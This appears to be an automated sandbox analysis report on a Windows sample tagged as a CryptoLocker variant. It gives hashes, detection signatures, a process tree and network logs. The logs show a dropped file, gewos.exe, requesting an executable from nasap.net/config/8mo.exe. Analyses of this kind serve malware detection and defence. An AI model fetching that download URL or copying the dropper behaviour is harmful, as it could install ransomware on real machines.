
Analysis

  • max time kernel
    91s
  • max time network
    113s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    18/04/2024, 05:45 UTC

General

  • Target

    2024-04-18_cb4cd07ca7b3fa8da3e4b62d32d84115_cryptolocker.exe

  • Size

    54KB

  • MD5

    cb4cd07ca7b3fa8da3e4b62d32d84115

  • SHA1

    37bef5bdc59858efae5da1a3ac6ba09c6515ebe4

  • SHA256

    6c7d288794c102582a324388235a1c908528bbdfc9b0bbad6cbf23b7f36ec6f0

  • SHA512

    bea6a0721fbef4f005640efdad37fd3c23cb0d5a0f18c8f7ee23abf4ff89fe2f4c4cb9bdee09af500a891a868a005cb6ec4c45851c2cee1638de9136d36a0c8a

  • SSDEEP

    768:bP9g/WItCSsAfFaeOcfXVr3BPOz5CFBmNuFgUjlo:bP9g/xtCS3Dxx0r

Score
9/10
upx

Malware Config

Signatures

  • Detection of CryptoLocker Variants 2 IoCs
  • UPX dump on OEP (original entry point) 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-04-18_cb4cd07ca7b3fa8da3e4b62d32d84115_cryptolocker.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-04-18_cb4cd07ca7b3fa8da3e4b62d32d84115_cryptolocker.exe"
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3696
    • C:\Users\Admin\AppData\Local\Temp\gewos.exe
      "C:\Users\Admin\AppData\Local\Temp\gewos.exe"
      • Checks computer location settings
      • Executes dropped EXE
      PID:4220

Network

  • US
    DNS
    76.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    76.32.126.40.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    25.24.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    25.24.18.2.in-addr.arpa
    IN PTR
    Response
    25.24.18.2.in-addr.arpa
    IN PTR
    a2-18-24-25.deploy.static.akamaitechnologies.com
  • US
    DNS
    nasap.net
    gewos.exe
    Remote address:
    8.8.8.8:53
    Request
    nasap.net
    IN A
    Response
    nasap.net
    IN A
    35.212.119.5
  • US
    GET
    https://nasap.net/config/8mo.exe
    gewos.exe
    Remote address:
    35.212.119.5:443
    Request
    GET /config/8mo.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Host: nasap.net
    Cache-Control: no-cache
    Response
    HTTP/1.1 301 Moved Permanently
    Server: nginx
    Date: Thu, 18 Apr 2024 05:45:44 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    X-Redirect-By: WordPress
    Location: https://www.nasap.net/config/8mo.exe
    X-Httpd: 1
    Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
    X-Proxy-Cache: MISS
    X-Proxy-Cache-Info: 0301 NC:000000 UP:
  • US
    DNS
    241.154.82.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.154.82.20.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    5.119.212.35.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    5.119.212.35.in-addr.arpa
    IN PTR
    Response
    5.119.212.35.in-addr.arpa
    IN PTR
    5.119.212.35.bc.googleusercontent.com
  • US
    DNS
    226.21.18.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    226.21.18.104.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.dual-a-0034.a-msedge.net
    g-bing-com.dual-a-0034.a-msedge.net
    IN CNAME
    dual-a-0034.a-msedge.net
    dual-a-0034.a-msedge.net
    IN A
    204.79.197.237
    dual-a-0034.a-msedge.net
    IN A
    13.107.21.237
  • US
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=91e8022f18ca4812a00abfcd71072e69&localId=w:FEA8F19F-01BE-DA76-49B1-72C0C15A5E1B&deviceId=6825832441142904&anid=
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=91e8022f18ca4812a00abfcd71072e69&localId=w:FEA8F19F-01BE-DA76-49B1-72C0C15A5E1B&deviceId=6825832441142904&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=1A729B9472E86BB51E158FF173CF6AF7; domain=.bing.com; expires=Tue, 13-May-2025 05:45:44 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: B3DA462FD7F3435A9106A7FD8B7936A2 Ref B: LON04EDGE0721 Ref C: 2024-04-18T05:45:44Z
    date: Thu, 18 Apr 2024 05:45:43 GMT
  • US
    GET
    https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=91e8022f18ca4812a00abfcd71072e69&localId=w:FEA8F19F-01BE-DA76-49B1-72C0C15A5E1B&deviceId=6825832441142904&anid=
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=91e8022f18ca4812a00abfcd71072e69&localId=w:FEA8F19F-01BE-DA76-49B1-72C0C15A5E1B&deviceId=6825832441142904&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=1A729B9472E86BB51E158FF173CF6AF7
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=2EejdJLj4EyIUpBFoPLPK5tw-0hnK57iKu2JE8-GuME; domain=.bing.com; expires=Tue, 13-May-2025 05:45:44 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: B2F279D302554488A4EA464F38A75E09 Ref B: LON04EDGE0721 Ref C: 2024-04-18T05:45:44Z
    date: Thu, 18 Apr 2024 05:45:43 GMT
  • US
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=91e8022f18ca4812a00abfcd71072e69&localId=w:FEA8F19F-01BE-DA76-49B1-72C0C15A5E1B&deviceId=6825832441142904&anid=
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=91e8022f18ca4812a00abfcd71072e69&localId=w:FEA8F19F-01BE-DA76-49B1-72C0C15A5E1B&deviceId=6825832441142904&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=1A729B9472E86BB51E158FF173CF6AF7; MSPTC=2EejdJLj4EyIUpBFoPLPK5tw-0hnK57iKu2JE8-GuME
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: B2FAAA32BB5A4DA59573F1F0910934CE Ref B: LON04EDGE0721 Ref C: 2024-04-18T05:45:44Z
    date: Thu, 18 Apr 2024 05:45:43 GMT
  • US
    DNS
    www.nasap.net
    gewos.exe
    Remote address:
    8.8.8.8:53
    Request
    www.nasap.net
    IN A
    Response
    www.nasap.net
    IN CNAME
    nasap.net
    nasap.net
    IN A
    35.212.119.5
  • US
    GET
    https://www.nasap.net/config/8mo.exe
    gewos.exe
    Remote address:
    35.212.119.5:443
    Request
    GET /config/8mo.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Cache-Control: no-cache
    Host: www.nasap.net
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 18 Apr 2024 05:45:44 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    Link: <https://www.nasap.net/index.php/wp-json/>; rel="https://api.w.org/"
    X-Httpd: 1
    Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
    X-Proxy-Cache: MISS
    X-Proxy-Cache-Info: 0 NC:000000 UP:
  • US
    DNS
    67.32.209.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    67.32.209.4.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    237.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    237.197.79.204.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    248.81.21.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    248.81.21.2.in-addr.arpa
    IN PTR
    Response
    248.81.21.2.in-addr.arpa
    IN PTR
    a2-21-81-248.deploy.static.akamaitechnologies.com
  • US
    DNS
    55.36.223.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    55.36.223.20.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    86.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    86.23.85.13.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    171.39.242.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    171.39.242.20.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    65.139.73.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    65.139.73.23.in-addr.arpa
    IN PTR
    Response
    65.139.73.23.in-addr.arpa
    IN PTR
    a23-73-139-65.deploy.static.akamaitechnologies.com
  • US
    DNS
    240.221.184.93.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.221.184.93.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    48.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    48.229.111.52.in-addr.arpa
    IN PTR
    Response
  • 35.212.119.5:443
    https://nasap.net/config/8mo.exe
    tls, http
    gewos.exe
    1.1kB
    5.7kB
    13
    10

    HTTP Request

    GET https://nasap.net/config/8mo.exe

    HTTP Response

    301
  • 204.79.197.237:443
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=91e8022f18ca4812a00abfcd71072e69&localId=w:FEA8F19F-01BE-DA76-49B1-72C0C15A5E1B&deviceId=6825832441142904&anid=
    tls, http2
    2.0kB
    9.2kB
    21
    19

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=91e8022f18ca4812a00abfcd71072e69&localId=w:FEA8F19F-01BE-DA76-49B1-72C0C15A5E1B&deviceId=6825832441142904&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=91e8022f18ca4812a00abfcd71072e69&localId=w:FEA8F19F-01BE-DA76-49B1-72C0C15A5E1B&deviceId=6825832441142904&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=91e8022f18ca4812a00abfcd71072e69&localId=w:FEA8F19F-01BE-DA76-49B1-72C0C15A5E1B&deviceId=6825832441142904&anid=

    HTTP Response

    204
  • 35.212.119.5:443
    https://www.nasap.net/config/8mo.exe
    tls, http
    gewos.exe
    3.6kB
    80.8kB
    67
    64

    HTTP Request

    GET https://www.nasap.net/config/8mo.exe

    HTTP Response

    404
  • 8.8.8.8:53
    76.32.126.40.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    76.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    25.24.18.2.in-addr.arpa
    dns
    69 B
    131 B
    1
    1

    DNS Request

    25.24.18.2.in-addr.arpa

  • 8.8.8.8:53
    nasap.net
    dns
    gewos.exe
    55 B
    71 B
    1
    1

    DNS Request

    nasap.net

    DNS Response

    35.212.119.5

  • 8.8.8.8:53
    241.154.82.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    241.154.82.20.in-addr.arpa

  • 8.8.8.8:53
    5.119.212.35.in-addr.arpa
    dns
    71 B
    122 B
    1
    1

    DNS Request

    5.119.212.35.in-addr.arpa

  • 8.8.8.8:53
    226.21.18.104.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    226.21.18.104.in-addr.arpa

  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
    151 B
    1
    1

    DNS Request

    g.bing.com

    DNS Response

    204.79.197.237
    13.107.21.237

  • 8.8.8.8:53
    www.nasap.net
    dns
    gewos.exe
    59 B
    89 B
    1
    1

    DNS Request

    www.nasap.net

    DNS Response

    35.212.119.5

  • 8.8.8.8:53
    67.32.209.4.in-addr.arpa
    dns
    70 B
    156 B
    1
    1

    DNS Request

    67.32.209.4.in-addr.arpa

  • 8.8.8.8:53
    237.197.79.204.in-addr.arpa
    dns
    73 B
    143 B
    1
    1

    DNS Request

    237.197.79.204.in-addr.arpa

  • 8.8.8.8:53
    248.81.21.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    248.81.21.2.in-addr.arpa

  • 8.8.8.8:53
    55.36.223.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    55.36.223.20.in-addr.arpa

  • 8.8.8.8:53
    86.23.85.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    86.23.85.13.in-addr.arpa

  • 8.8.8.8:53
    171.39.242.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    171.39.242.20.in-addr.arpa

  • 8.8.8.8:53
    65.139.73.23.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    65.139.73.23.in-addr.arpa

  • 8.8.8.8:53
    240.221.184.93.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    240.221.184.93.in-addr.arpa

  • 8.8.8.8:53
    48.229.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    48.229.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\gewos.exe

    Filesize

    54KB

    MD5

    02245cd1438188c3953c0b91644d0faa

    SHA1

    bfaad705a0a01156d86d01f0d384d9e122fab294

    SHA256

    8c95d3c342350095151b57af66a5f80a97d6ae81863daa28473be3b52bbef7a6

    SHA512

    510667f5615571327cf6141f10d72aa10d5fe8afa296ee71d08d7e5b6409e8935aaf8e50b6bf364f970ff8c4118e6b609970b5700d7a718b6247b8c5634bc6d5

  • memory/3696-0-0x0000000000400000-0x000000000040E000-memory.dmp

    Filesize

    56KB

  • memory/3696-1-0x0000000002250000-0x0000000002256000-memory.dmp

    Filesize

    24KB

  • memory/3696-2-0x0000000002250000-0x0000000002256000-memory.dmp

    Filesize

    24KB

  • memory/3696-3-0x0000000000400000-0x0000000000406000-memory.dmp

    Filesize

    24KB

  • memory/4220-22-0x00000000006B0000-0x00000000006B6000-memory.dmp

    Filesize

    24KB
